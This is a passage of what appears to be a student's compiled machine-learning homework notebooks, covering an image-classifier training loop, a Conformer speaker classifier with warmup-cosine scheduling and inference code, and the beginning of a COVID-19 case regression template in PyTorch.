        model.train()

        # These are used to record information in training.
        train_loss = []
        train_accs = []

        for batch in tqdm(train_loader):

            # A batch consists of image data and corresponding labels.
            imgs, labels = batch
            #imgs = imgs.half()
            #print(imgs.shape,labels.shape)

            # Forward the data. (Make sure data and model are on the same device.)
            logits = model(imgs.to(device))

            # Calculate the cross-entropy loss.
            # We don't need to apply softmax before computing cross-entropy as it is done automatically.
            loss = criterion(logits, labels.to(device))

            # Gradients stored in the parameters in the previous step should be cleared out first.
            optimizer.zero_grad()

            # Compute the gradients for parameters.
            loss.backward()

            # Clip the gradient norms for stable training.
            # nn.utils.clip_grad_norm_ rescales the gradients in place so that
            # their total L2 norm does not exceed max_norm (here 10), and
            # returns that norm.
            grad_norm = nn.utils.clip_grad_norm_(model.parameters(), max_norm=10)

            # Update the parameters with the computed gradients.
            optimizer.step()

            # Compute the accuracy for the current batch.
            acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

            # Record the loss and accuracy.
            train_loss.append(loss.item())
            train_accs.append(acc)

        train_loss = sum(train_loss) / len(train_loss)
        train_acc = sum(train_accs) / len(train_accs)

        # Print the information.
        print(f"[ Train | {epoch + 1:03d}/{n_epochs:03d} ] loss = {train_loss:.5f}, acc = {train_acc:.5f}")

        # ---------- Validation ----------
        # Make sure the model is in eval mode so that modules like dropout are disabled and work normally.
        model.eval()

        # These are used to record information in validation.
        valid_loss = []
        valid_accs = []

        # Iterate the validation set by batches.
        for batch in tqdm(valid_loader):

            # A batch consists of image data and corresponding labels.
            imgs, labels = batch
            #imgs = imgs.half()

            # We don't need gradients in validation.
            # Using torch.no_grad() accelerates the forward process.
            with torch.no_grad():
                logits = model(imgs.to(device))

            # We can still compute the loss (but not the gradient).
            loss = criterion(logits, labels.to(device))

            # Compute the accuracy for the current batch.
            acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()

            # Record the loss and accuracy.
            valid_loss.append(loss.item())
            valid_accs.append(acc)
            #break

        # The average loss and accuracy of the entire validation set is the average of the recorded values.
        valid_loss = sum(valid_loss) / len(valid_loss)
        valid_acc = sum(valid_accs) / len(valid_accs)

        # Print the information.
        print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


        # update logs
        if valid_acc > best_acc:
            with open(f"./{_exp_name}_log.txt","a"):
                print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f} -> best")
        else:
            with open(f"./{_exp_name}_log.txt","a"):
                print(f"[ Valid | {epoch + 1:03d}/{n_epochs:03d} ] loss = {valid_loss:.5f}, acc = {valid_acc:.5f}")


        # save models
        if valid_acc > best_acc:
            print(f"Best model found at epoch {epoch}, saving model")
            torch.save(model.state_dict(), f"{_exp_name}_best.ckpt")  # only save the best checkpoint to prevent exceeding the output quota
            best_acc = valid_acc
            stale = 0
        else:
            stale += 1
            if stale > patience:
                print(f"No improvement for {patience} consecutive epochs, early stopping")
                break
      0%|          | 0/157 [00:00<?, ?it/s]
    [ Train | 001/008 ] loss = 1.87167, acc = 0.34385
      0%|          | 0/57 [00:00<?, ?it/s]
    [ Valid | 001/008 ] loss = 1.87423, acc = 0.34339
    [ Valid | 001/008 ] loss = 1.87423, acc = 0.34339 -> best
    Best model found at epoch 0, saving model

    ……

    [ Train | 008/008 ] loss = 0.66352, acc = 0.77070
      0%|          | 0/57 [00:00<?, ?it/s]
    [ Valid | 008/008 ] loss = 1.28541, acc = 0.58910
    [ Valid | 008/008 ] loss = 1.28541, acc = 0.58910

    Dataloader for test

    # Construct the test dataset with the test-time transform.
    test_set = FoodDataset("/kaggle/input/ml2023spring-hw3/test", tfm=test_tfm)
    test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=False, num_workers=0, pin_memory=True)

    Testing and generate prediction CSV

    model_best = Classifier().to(device)
    model_best.load_state_dict(torch.load(f"{_exp_name}_best.ckpt"))
    model_best.eval()
    prediction = []
    with torch.no_grad():
        for data, _ in tqdm(test_loader):
            test_pred = model_best(data.to(device))
            test_label = np.argmax(test_pred.cpu().data.numpy(), axis=1)
            prediction += test_label.squeeze().tolist()
      0%|          | 0/47 [00:00<?, ?it/s]
    # create the test csv
    def pad4(i):
        return "0"*(4-len(str(i)))+str(i)  # zero-pad the index to 4 digits, e.g. 7 -> "0007"

    df = pd.DataFrame()
    df["Id"] = [pad4(i) for i in range(len(test_set))]
    df["Category"] = prediction
    df.to_csv("submission.csv", index=False)

    HW4 Self-attention

    # --- Initialization ---
    import numpy as np
    import torch
    import random

    def set_seed(seed):
        np.random.seed(seed)
        random.seed(seed)
        torch.manual_seed(seed)
        if torch.cuda.is_available():
            torch.cuda.manual_seed(seed)
            torch.cuda.manual_seed_all(seed)
        torch.backends.cudnn.benchmark = False
        torch.backends.cudnn.deterministic = True

    set_seed(114514)
    # --- Dataset ---
    import os
    import json
    import torch
    import random
    from pathlib import Path
    from torch.utils.data import Dataset
    from torch.nn.utils.rnn import pad_sequence

    class myDataset(Dataset):
        def __init__(self, data_dir, segment_len=128):
            '''
            data_dir: path to the audio features;
            segment_len: length of each audio segment (default 128 frames).
            '''
            self.data_dir = data_dir
            self.segment_len = segment_len

            # Load the speaker-name-to-ID mapping from mapping.json in the dataset folder.
            mapping_path = Path(data_dir) / "mapping.json"
            mapping = json.load(mapping_path.open())
            self.speaker2id = mapping["speaker2id"]  # maps speaker names to IDs

            # Load the metadata, which describes every speaker's utterances.
            metadata_path = Path(data_dir) / "metadata.json"
            metadata = json.load(open(metadata_path))["speakers"]

            # Get the total number of speakers.
            self.speaker_num = len(metadata.keys())
            self.data = []

            # Build (feature_path, speaker_id) pairs.
            for speaker in metadata.keys():  # iterate over every speaker in metadata.json
                for utterances in metadata[speaker]:
                    # each entry pairs an utterance's feature file with its speaker's ID
                    self.data.append([utterances["feature_path"], self.speaker2id[speaker]])


        def __len__(self):
            '''Number of utterances in the dataset.'''
            return len(self.data)

        def __getitem__(self, index):
            # Look up the feature path and speaker ID for this utterance,
            # then load its mel-spectrogram from disk.
            feat_path, speaker = self.data[index]
            mel = torch.load(os.path.join(self.data_dir, feat_path))

            # Segment the mel-spectrogram into "segment_len"-frame pieces.
            if len(mel) > self.segment_len:
                # Randomly pick a starting point, then read segment_len frames from there.
                start = random.randint(0, len(mel) - self.segment_len)
                mel = torch.FloatTensor(mel[start:start+self.segment_len])
            else:
                mel = torch.FloatTensor(mel)
            # Cast the speaker ID to a long tensor.
            speaker = torch.FloatTensor([speaker]).long()
            # Return the segment and its speaker ID.
            return mel, speaker

        def get_speaker_number(self):
            '''Number of speakers in the dataset.'''
            return self.speaker_num
    # --- Dataloader ---
    import torch
    from torch.utils.data import DataLoader, random_split
    from torch.nn.utils.rnn import pad_sequence


    def collate_batch(batch):
        """Collate a batch of data."""
        mel, speaker = zip(*batch)
        # Because we train the model batch by batch, we need to pad the features
        # in the same batch to make their lengths the same: pad_sequence appends
        # the padding value to the shorter mel features, so utterances of
        # different lengths can be stacked into one batch.
        mel = pad_sequence(mel, batch_first=True, padding_value=-20)  # pad with log 10^(-20), a very small value
        # mel: (batch size, length, 40)
        return mel, torch.FloatTensor(speaker).long()


    def get_dataloader(data_dir, batch_size, n_workers):
        """
        Generate dataloaders.
        data_dir: dataset path;
        batch_size: batch size;
        n_workers: number of worker processes for data loading.
        """
        dataset = myDataset(data_dir)
        speaker_num = dataset.get_speaker_number()
        # Split the data: 90% for training, the rest for validation.
        trainlen = int(0.9 * len(dataset))
        lengths = [trainlen, len(dataset) - trainlen]
        trainset, validset = random_split(dataset, lengths)

        train_loader = DataLoader(
            trainset,                  # the dataset to load from
            batch_size=batch_size,     # samples per batch
            shuffle=True,              # shuffle the training data
            num_workers=n_workers,     # worker processes used for loading
            drop_last=True,            # drop the last batch if it is smaller than batch_size
            pin_memory=True,           # pin host memory to speed up host-to-GPU transfers
            collate_fn=collate_batch,  # batch assembly and padding, implemented by collate_batch
        )
        valid_loader = DataLoader(
            validset,
            batch_size=batch_size,
            num_workers=n_workers,
            drop_last=True,
            pin_memory=True,
            collate_fn=collate_batch,
        )

        return train_loader, valid_loader, speaker_num
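
    A minimal illustration of what pad_sequence does inside collate_batch (toy tensors with assumed shapes):

    a = torch.zeros(3, 40)  # a 3-frame utterance
    b = torch.ones(5, 40)   # a 5-frame utterance
    batch = pad_sequence([a, b], batch_first=True, padding_value=-20)
    print(batch.shape)      # torch.Size([2, 5, 40]); the shorter utterance is padded to 5 frames with -20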
    # --- Model ---
    !pip install conformer
    import torch
    import torch.nn as nn
    import torch.nn.functional as F
    from conformer import ConformerBlock

    class Classifier(nn.Module):
        def __init__(self, d_model=256, n_spks=600, dropout=0.2):
            '''
            A speaker classifier: it assigns an utterance to one of n_spks speakers.
            d_model is the feature dimension, n_spks the number of speakers,
            and dropout the dropout probability.
            '''
            super().__init__()
            # Prenet: a fully connected layer that projects the 40-dim mel
            # features up to a d_model-dim representation.
            self.prenet = nn.Linear(40, d_model)

            # self.encoder_layer = nn.TransformerEncoderLayer(
            #     d_model=d_model, dim_feedforward=256, nhead=2
            # )
            # self.encoder = nn.TransformerEncoder(self.encoder_layer, num_layers=2)
            # A plain Transformer underperformed here; Conformer works better.
            # Encoder: a ConformerBlock that encodes the prenet output into a
            # representation suitable for classification. It combines multi-head
            # self-attention with depthwise-separable convolution, stacking
            # nonlinear transforms to extract more abstract features.
            self.encoder = ConformerBlock(
                dim=d_model,
                dim_head=4,
                heads=4,                  # number of attention heads
                ff_mult=4,                # expansion multiplier of the feed-forward network
                conv_expansion_factor=2,  # expansion multiplier of the convolution module
                conv_kernel_size=20,
                attn_dropout=dropout,     # dropout in the attention module
                ff_dropout=dropout,       # dropout in the feed-forward module
                conv_dropout=dropout      # dropout in the convolution module
            )
            # Project the dimension of features from d_model onto the speakers.
            # pred_layer: a small fully connected network that predicts the speaker.
            self.pred_layer = nn.Sequential(
                nn.BatchNorm1d(d_model),      # batch-normalize the pooled features
                nn.Linear(d_model, d_model),  # one hidden fully connected layer
                nn.Sigmoid(),                 # squash each dimension into [0, 1]
                nn.Linear(d_model, n_spks),   # final linear layer outputs the per-speaker scores
            )

        def forward(self, mels):
            """
            args:
                mels: (batch size, length, 40)
            return:
                out: (batch size, n_spks)
            """
            # out: (batch size, length, d_model)
            # First project the mel features through the prenet, up to d_model dims.
            out = self.prenet(mels)
            # out: (length, batch size, d_model)
            # Swap the first two dimensions with permute(1, 0, 2), since the
            # encoder layer expects features shaped (length, batch size, d_model).
            out = out.permute(1, 0, 2)
            # Run the encoder. The ConformerBlock augments self-attention with
            # depthwise-separable convolution and a position-wise feed-forward
            # module, which captures the temporal structure of speech well.
            out = self.encoder(out)
            # out: (batch size, length, d_model)
            # Swap the first two dimensions back.
            out = out.transpose(0, 1)
            # Mean pooling over the time axis: stats has shape (batch size, d_model)
            # and is the average feature vector of each utterance.
            stats = out.mean(dim=1)

            # out: (batch, n_spks)
            # Feed the pooled statistics to pred_layer to get one score per speaker;
            # the output is the distribution over which speaker each utterance belongs to.
            out = self.pred_layer(stats)
            return out
    import math

    import torch
    from torch.optim import Optimizer
    from torch.optim.lr_scheduler import LambdaLR

    # Learning-rate schedule: linear warmup followed by cosine decay.
    def get_cosine_schedule_with_warmup(
        optimizer: Optimizer,     # the optimizer whose learning rate is scheduled
        num_warmup_steps: int,    # warmup length: the LR ramps up over these first steps
        num_training_steps: int,  # total number of training steps
        num_cycles: float = 0.5,  # number of cosine cycles (0.5 = one half-wave from max down to 0)
        last_epoch: int = -1,     # optional starting epoch when resuming training
    ):
        def lr_lambda(current_step):
            # The nested lr_lambda maps the current step to a multiplier on the base LR.
            # Warmup: for the first num_warmup_steps steps the multiplier grows
            # linearly from 0 to 1 (early training usually needs a small LR to
            # avoid exploding or vanishing gradients).
            if current_step < num_warmup_steps:
                return float(current_step) / float(max(1, num_warmup_steps))
            # Decay: over the remaining steps the multiplier follows a cosine
            # curve and gradually falls toward 0.
            progress = float(current_step - num_warmup_steps) / float(
                max(1, num_training_steps - num_warmup_steps)
            )
            return max(
                0.0, 0.5 * (1.0 + math.cos(math.pi * float(num_cycles) * 2.0 * progress))
            )
        # Wrap lr_lambda in a LambdaLR scheduler and return it for use during training.
        return LambdaLR(optimizer, lr_lambda, last_epoch)
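
    A tiny sketch of how this schedule behaves (the dummy parameter and the step counts are arbitrary assumptions):

    dummy = torch.nn.Parameter(torch.zeros(1))
    opt = torch.optim.AdamW([dummy], lr=1e-3)
    sched = get_cosine_schedule_with_warmup(opt, num_warmup_steps=10, num_training_steps=100)
    for step in range(100):
        opt.step()
        sched.step()
        if step in (0, 9, 50, 99):
            print(step, sched.get_last_lr())  # ramps linearly up to 1e-3 by step 9, then decays along a cosine toward 0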
    # --- Training helpers ---
    import torch

    def model_fn(batch, model, criterion, device):
        """Forward a batch through the model."""
        # Unpack the batch and move it to the device.
        mels, labels = batch
        mels = mels.to(device)
        labels = labels.to(device)
        # Forward pass and loss.
        outs = model(mels)
        loss = criterion(outs, labels)
        # The predicted speaker ID is the class with the highest score.
        preds = outs.argmax(1)
        # Accuracy of this batch.
        accuracy = torch.mean((preds == labels).float())

        return loss, accuracy
    # --- Validation ---
    from tqdm import tqdm
    import torch


    def valid(dataloader, model, criterion, device):
        """Validate on the validation set."""

        model.eval()
        running_loss = 0.0
        running_accuracy = 0.0
        pbar = tqdm(total=len(dataloader.dataset), ncols=0, desc="Valid", unit=" uttr")

        for i, batch in enumerate(dataloader):
            with torch.no_grad():
                loss, accuracy = model_fn(batch, model, criterion, device)
                running_loss += loss.item()
                running_accuracy += accuracy.item()

            pbar.update(dataloader.batch_size)
            pbar.set_postfix(
                loss=f"{running_loss / (i+1):.2f}",
                accuracy=f"{running_accuracy / (i+1):.2f}",
            )

        pbar.close()
        model.train()

        return running_accuracy / len(dataloader)
    from tqdm import tqdm
    import torch
    import torch.nn as nn
    from torch.optim import AdamW
    from torch.utils.data import DataLoader, random_split


    def parse_args():
        # hyperparameters
        config = {
            "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
            "save_path": "/kaggle/working/model.ckpt",
            "batch_size": 32,
            "n_workers": 8,
            "valid_steps": 2000,
            "warmup_steps": 1000,
            "save_steps": 10000,
            "total_steps": 70000,
        }

        return config


    def main(
        data_dir,
        save_path,
        batch_size,
        n_workers,
        valid_steps,
        warmup_steps,
        total_steps,
        save_steps,
    ):
        """Main function."""
        device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        print(f"[Info]: Use {device} now!")

        train_loader, valid_loader, speaker_num = get_dataloader(data_dir, batch_size, n_workers)
        train_iterator = iter(train_loader)
        print(f"[Info]: Finish loading data!", flush=True)

        # Build the model...
        model = Classifier(n_spks=speaker_num).to(device)
        # ...the loss function...
        criterion = nn.CrossEntropyLoss()
        # ...the optimizer...
        optimizer = AdamW(model.parameters(), lr=1e-3)
        # ...and the learning-rate scheduler wrapped around the optimizer.
        scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)
        print(f"[Info]: Finish creating model!", flush=True)

        model.load_state_dict(torch.load(f"/kaggle/input/hw4model3/model (3).ckpt"))

        best_accuracy = -1.0
        best_state_dict = None

        pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")
        torch.save(best_state_dict, save_path)
        for step in range(total_steps):
            # Get data
            try:
                batch = next(train_iterator)
            except StopIteration:
                # The iterator is exhausted: start a new pass over the training data.
                train_iterator = iter(train_loader)
                batch = next(train_iterator)

            loss, accuracy = model_fn(batch, model, criterion, device)
            batch_loss = loss.item()
            batch_accuracy = accuracy.item()

            # Update model
            loss.backward()
            optimizer.step()
            scheduler.step()
            optimizer.zero_grad()
            # Log
            pbar.update()
            pbar.set_postfix(
                loss=f"{batch_loss:.2f}",
                accuracy=f"{batch_accuracy:.2f}",
                step=step + 1,
            )

            # Do validation
            if (step + 1) % valid_steps == 0:
                pbar.close()

                valid_accuracy = valid(valid_loader, model, criterion, device)

                # keep the best model
                if valid_accuracy > best_accuracy:
                    best_accuracy = valid_accuracy
                    best_state_dict = model.state_dict()

                pbar = tqdm(total=valid_steps, ncols=0, desc="Train", unit=" step")

            # Save the best model so far.
            if (step + 1) % save_steps == 0 and best_state_dict is not None:
                torch.save(best_state_dict, save_path)
                pbar.write(f"Step {step + 1}, best model saved. (accuracy={best_accuracy:.4f})")

        pbar.close()


    if __name__ == "__main__":
        main(**parse_args())
    import json
    import csv
    from pathlib import Path
    from tqdm.notebook import tqdm

    import torch
    from torch.utils.data import DataLoader

    def parse_args():
        """arguments"""
        config = {
            "data_dir": "/kaggle/input/ml2023springhw4/Dataset",
            "model_path": "/kaggle/working/model.ckpt",
            "output_path": "/kaggle/working/output.csv",
        }

        return config


    def main(
        data_dir,
        model_path,
        output_path,
    ):
        """Main function."""
        device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
        print(f"[Info]: Use {device} now!")

        mapping_path = Path(data_dir) / "mapping.json"
        mapping = json.load(mapping_path.open())

        dataset = InferenceDataset(data_dir)
        dataloader = DataLoader(
            dataset,
            batch_size=1,
            shuffle=False,
            drop_last=False,
            num_workers=8,
            collate_fn=inference_collate_batch,
        )
        print(f"[Info]: Finish loading data!", flush=True)

        speaker_num = len(mapping["id2speaker"])
        model = Classifier(n_spks=speaker_num).to(device)
        model.load_state_dict(torch.load(model_path))
        model.eval()
        print(f"[Info]: Finish creating model!", flush=True)

        results = [["Id", "Category"]]
        for feat_paths, mels in tqdm(dataloader):
            with torch.no_grad():
                mels = mels.to(device)
                outs = model(mels)
                preds = outs.argmax(1).cpu().numpy()
                for feat_path, pred in zip(feat_paths, preds):
                    results.append([feat_path, mapping["id2speaker"][str(pred)]])

        with open(output_path, 'w', newline='') as csvfile:
            writer = csv.writer(csvfile)
            writer.writerows(results)


    if __name__ == "__main__":
        main(**parse_args())
    # --- Inference dataset for the submission ---
    import os
    import json
    import torch
    from pathlib import Path
    from torch.utils.data import Dataset


    class InferenceDataset(Dataset):
        def __init__(self, data_dir):
            testdata_path = Path(data_dir) / "testdata.json"
            metadata = json.load(testdata_path.open())
            self.data_dir = data_dir
            self.data = metadata["utterances"]

        def __len__(self):
            return len(self.data)

        def __getitem__(self, index):
            utterance = self.data[index]
            feat_path = utterance["feature_path"]
            mel = torch.load(os.path.join(self.data_dir, feat_path))

            return feat_path, mel


    def inference_collate_batch(batch):
        """Collate a batch of data."""
        feat_paths, mels = zip(*batch)

        return feat_paths, torch.stack(mels)

Homework 1: COVID-19 Cases Prediction (Regression)

    Objectives:

• Solve a regression problem with deep neural networks (DNN).
• Understand basic DNN training tips.
• Familiarize yourself with PyTorch.

    If you have any questions, please contact the TAs via TA hours, NTU COOL, or email to mlta-2023-spring@googlegroups.com

    # check gpu type
    !nvidia-smi
Tue May  2 06:43:11 2023
NVIDIA-SMI 525.85.12   Driver Version: 525.85.12   CUDA Version: 12.0
GPU 0: Tesla T4, 0MiB / 15360MiB used, 0% utilization, no running processes

    Download data

If the Google Drive links below do not work, you can use the dropbox link below or download data from Kaggle, and upload data manually to the workspace.

    # google drive link
    # !gdown --id '1BjXalPZxq9mybPKNjF3h5L3NcF7XKTS-' --output covid_train.csv
    # !gdown --id '1B55t74Jg2E5FCsKCsUEkPKIuqaY7UIi1' --output covid_test.csv

    # dropbox link
    !wget -O covid_train.csv https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
    !wget -O covid_test.csv https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
--2023-05-02 06:43:11--  https://www.dropbox.com/s/lmy1riadzoy0ahw/covid.train.csv?dl=0
2023-05-02 06:43:12 (4.86 MB/s) - ‘covid_train.csv’ saved [2162766/2162766]

--2023-05-02 06:43:13--  https://www.dropbox.com/s/zalbw42lu4nmhr2/covid.test.csv?dl=0
2023-05-02 06:43:14 (16.9 MB/s) - ‘covid_test.csv’ saved [638359/638359]

    Import packages

# Numerical operations
import math
import numpy as np

# Reading/writing data
import pandas as pd
import os
import csv

# For the progress bar
from tqdm import tqdm

# PyTorch
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader, random_split

# For plotting the learning curve
from torch.utils.tensorboard import SummaryWriter

    Some Utility Functions


    You do not need to modify this part.

def same_seed(seed):
    '''
    Fixes random number generator seeds for reproducibility.
    '''
    torch.backends.cudnn.deterministic = True  # Make cuDNN deterministic so every run produces the same results.
    torch.backends.cudnn.benchmark = False     # Disable cuDNN auto-tuning, which can introduce run-to-run variance.
    np.random.seed(seed)                       # Seed NumPy's random number generator.
    torch.manual_seed(seed)                    # Seed PyTorch on the CPU.
    if torch.cuda.is_available():              # Seed PyTorch on all GPUs, if available.
        torch.cuda.manual_seed_all(seed)

def train_valid_split(data_set, valid_ratio, seed):
    '''
    Split provided training data into training set and validation set.
    '''
    valid_set_size = int(valid_ratio * len(data_set))  # Validation size from the ratio and dataset length.
    train_set_size = len(data_set) - valid_set_size    # The rest goes to training.
    # random_split takes the dataset, a list of split sizes (train first, then valid),
    # and a generator whose manual seed makes the split reproducible.
    train_set, valid_set = random_split(data_set, [train_set_size, valid_set_size], generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)    # Return both splits as NumPy arrays.

def predict(test_loader, model, device):
    '''
    Run a trained model over the test set and return its predictions.
    test_loader: a PyTorch DataLoader that yields test batches;
    model: a trained network;
    device: the computation device, e.g. "cpu" or "cuda".
    '''
    model.eval()   # Set your model to evaluation mode.
    preds = []     # Collect per-batch predictions here.
    for x in tqdm(test_loader):    # Iterate over the test data batch by batch.
        x = x.to(device)           # Move the batch to the target device.
        with torch.no_grad():      # No gradients are needed during inference.
            pred = model(x)        # Predict on the current batch.
            preds.append(pred.detach().cpu())  # Stash the predictions on the CPU.
    # Concatenate all batch predictions along the batch dimension and return a NumPy array.
    preds = torch.cat(preds, dim=0).numpy()
    return preds
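To see how these helpers fit together, here is a minimal sketch on a hypothetical toy array (the array and seed below are illustrative, not part of the homework):

same_seed(5201314)
toy_data = np.arange(100).reshape(50, 2)   # 50 samples, 2 columns (last column as the target)
train, valid = train_valid_split(toy_data, valid_ratio=0.2, seed=5201314)
print(train.shape, valid.shape)            # (40, 2) (10, 2)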

    Dataset

class COVID19Dataset(Dataset):
    '''
    x: Features.
    y: Targets; if None, do prediction.
    '''
    def __init__(self, x, y=None):
        if y is None:
            self.y = y                      # No targets in prediction mode.
        else:
            self.y = torch.FloatTensor(y)   # Convert targets to a tensor.
        self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
        if self.y is None:
            return self.x[idx]              # Return features only.
        else:
            return self.x[idx], self.y[idx] # Return features and the matching target.

    def __len__(self):
        return len(self.x)                  # Dataset length.
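As a hypothetical quick check (the random arrays below are only for illustration), the dataset plugs straight into a DataLoader:

xs = np.random.rand(8, 5).astype(np.float32)
ys = np.random.rand(8).astype(np.float32)
ds = COVID19Dataset(xs, ys)
x0, y0 = ds[0]                              # one (feature, target) pair
loader = DataLoader(ds, batch_size=4, shuffle=False)
xb, yb = next(iter(loader))                 # xb: (4, 5), yb: (4,)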

    Neural Network Model

    Try out different model architectures by modifying the class below.


class My_Model(nn.Module):  # A custom PyTorch model, subclassing nn.Module.
    def __init__(self, input_dim):  # input_dim is the dimensionality of the input features.
        super(My_Model, self).__init__()
        # TODO: modify model's structure, be aware of dimensions.
        # self.layers chains several layers and activations with nn.Sequential:
        # three linear layers with two ReLU activations in between.
        self.layers = nn.Sequential(
            nn.Linear(input_dim, 16),
            nn.ReLU(),
            nn.Linear(16, 8),
            nn.ReLU(),
            nn.Linear(8, 1)
        )

    def forward(self, x):
        '''
        Forward pass: x flows through the layers and activations to produce the prediction.
        '''
        x = self.layers(x)
        # Squeeze the output from shape (batch_size, 1) to (batch_size,) for the loss computation.
        x = x.squeeze(1)  # (B, 1) -> (B)
        return x
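Since the TODO invites other architectures, here is one hedged sketch of a wider variant (the layer sizes are assumptions for illustration, not the course's reference solution):

class WiderModel(nn.Module):
    def __init__(self, input_dim):
        super().__init__()
        self.layers = nn.Sequential(
            nn.Linear(input_dim, 64),   # wider first hidden layer (size is an assumption)
            nn.ReLU(),
            nn.Linear(64, 32),
            nn.ReLU(),
            nn.Linear(32, 1),
        )

    def forward(self, x):
        return self.layers(x).squeeze(1)  # (B, 1) -> (B)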

    Feature Selection

    Choose features you deem useful by modifying the function below.


def select_feat(train_data, valid_data, test_data, select_all=True):
    '''
    Selects useful features to perform regression.
    train_data / valid_data / test_data are the raw arrays; select_all (default True)
    controls whether every feature column is used.
    '''
    # The label is the last column of the training and validation arrays.
    y_train, y_valid = train_data[:,-1], valid_data[:,-1]
    # Everything except the label column becomes the raw feature matrix for each split.
    raw_x_train, raw_x_valid, raw_x_test = train_data[:,:-1], valid_data[:,:-1], test_data

    if select_all:
        feat_idx = list(range(raw_x_train.shape[1]))  # Keep every feature column.
    else:
        feat_idx = [0,1,2,3,4]  # TODO: Select suitable feature columns.
    # Return the chosen feature columns for each split, plus the train/valid labels.
    return raw_x_train[:,feat_idx], raw_x_valid[:,feat_idx], raw_x_test[:,feat_idx], y_train, y_valid
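For the TODO, one hedged way to pick columns is to rank features by their absolute Pearson correlation with the target on the training split; the helper below is an illustrative sketch (the cutoff k is an assumption, not the official solution):

def top_k_by_correlation(raw_x_train, y_train, k=16):
    # Absolute correlation of each feature column with the target.
    corrs = np.array([
        abs(np.corrcoef(raw_x_train[:, j], y_train)[0, 1])
        for j in range(raw_x_train.shape[1])
    ])
    return np.argsort(-corrs)[:k].tolist()  # indices of the k strongest features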

    Training Loop

def trainer(train_loader, valid_loader, model, config, device):
    # Mean squared error measures the gap between predictions and targets.
    criterion = nn.MSELoss(reduction='mean')  # Define your loss function, do not modify this.

    # Define your optimization algorithm.
    # TODO: Please check https://pytorch.org/docs/stable/optim.html to get more available algorithms.
    # TODO: L2 regularization (optimizer(weight decay...) or implement by yourself).
    # Stochastic gradient descent over model.parameters(), with the configured
    # learning rate and a momentum of 0.7.
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.7)
    writer = SummaryWriter()  # Writer of tensorboard: logs training metrics for visualization.

    if not os.path.isdir('./models'):
        os.mkdir('./models')  # Create a directory for saving models.
    # Track the epoch budget, the best loss so far, the global step, and the early-stop counter.
    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
        model.train()      # Set your model to train mode.
        loss_record = []   # Collect the per-batch losses of this epoch.

        # tqdm visualizes the training progress.
        train_pbar = tqdm(train_loader, position=0, leave=True)

        for x, y in train_pbar:                # Iterate over feature/label batches.
            optimizer.zero_grad()              # Clear gradients left over from the previous step.
            x, y = x.to(device), y.to(device)  # Move the batch to the target device.
            pred = model(x)                    # Forward pass.
            loss = criterion(pred, y)          # Loss between predictions and targets.
            loss.backward()                    # Compute gradients (backpropagation).
            optimizer.step()                   # Update parameters.
            step += 1
            loss_record.append(loss.detach().item())  # Record this batch's loss.

            # Display the current epoch number and loss on the tqdm progress bar.
            train_pbar.set_description(f'Epoch [{epoch+1}/{n_epochs}]')
            train_pbar.set_postfix({'loss': loss.detach().item()})

        mean_train_loss = sum(loss_record)/len(loss_record)     # Average training loss this epoch.
        writer.add_scalar('Loss/train', mean_train_loss, step)  # Log it to tensorboard.

        model.eval()  # Set your model to evaluation mode for validation.
        loss_record = []
        for x, y in valid_loader:
            x, y = x.to(device), y.to(device)
            with torch.no_grad():  # No gradients during validation.
                pred = model(x)
                loss = criterion(pred, y)

            loss_record.append(loss.item())

        mean_valid_loss = sum(loss_record)/len(loss_record)  # Average validation loss this epoch.
        print(f'Epoch [{epoch+1}/{n_epochs}]: Train loss: {mean_train_loss:.4f}, Valid loss: {mean_valid_loss:.4f}')
        # writer.add_scalar('Loss/valid', mean_valid_loss, step)

        if mean_valid_loss < best_loss:
            # A new best validation loss: remember it, save the model, and reset early stopping.
            best_loss = mean_valid_loss
            torch.save(model.state_dict(), config['save_path'])  # Save your best model.
            print('Saving model with loss {:.3f}...'.format(best_loss))
            early_stop_count = 0
        else:
            early_stop_count += 1  # No improvement this epoch.

        if early_stop_count >= config['early_stop']:
            # Too many epochs without improvement: stop training.
            print('\nModel is not improving, so we halt the training session.')
            return
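The TODO above mentions L2 regularization; in PyTorch's SGD this is typically the weight_decay argument, as in the hedged sketch below (the value 1e-4 is an assumption to tune, not a prescribed setting):

optimizer = torch.optim.SGD(
    model.parameters(),
    lr=config['learning_rate'],
    momentum=0.7,
    weight_decay=1e-4,  # L2 penalty on the weights (value is an assumption)
)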

    Configurations

    config contains hyper-parameters for training and the path to save your model.


device = 'cuda' if torch.cuda.is_available() else 'cpu'
config = {
    'seed': 5201314,      # Your seed number, you can pick your lucky number. :)
    'select_all': True,   # Whether to use all features.
    'valid_ratio': 0.2,   # validation_size = train_size * valid_ratio
    'n_epochs': 5000,     # Number of epochs.
    'batch_size': 256,
    'learning_rate': 1e-5,
    'early_stop': 600,    # If the model has not improved for this many consecutive epochs, stop training.
    'save_path': './models/model.ckpt'  # Your model will be saved here.
}

    Dataloader

    Read data from files and set up training, validation, and testing sets. You do not need to modify this part.


same_seed(config['seed'])  # Fix the random seed so results are reproducible.
# Read the training and test sets from CSV and convert them to NumPy arrays.
train_data, test_data = pd.read_csv('./covid_train.csv').values, pd.read_csv('./covid_test.csv').values
# Split the raw training data into a training set and a validation set.
train_data, valid_data = train_valid_split(train_data, config['valid_ratio'], config['seed'])

# Print out the data size.
print(f"""train_data size: {train_data.shape}
valid_data size: {valid_data.shape}
test_data size: {test_data.shape}""")

# Select features: either all of them, or a subset chosen inside select_feat.
x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data, valid_data, test_data, config['select_all'])

# Print out the number of features.
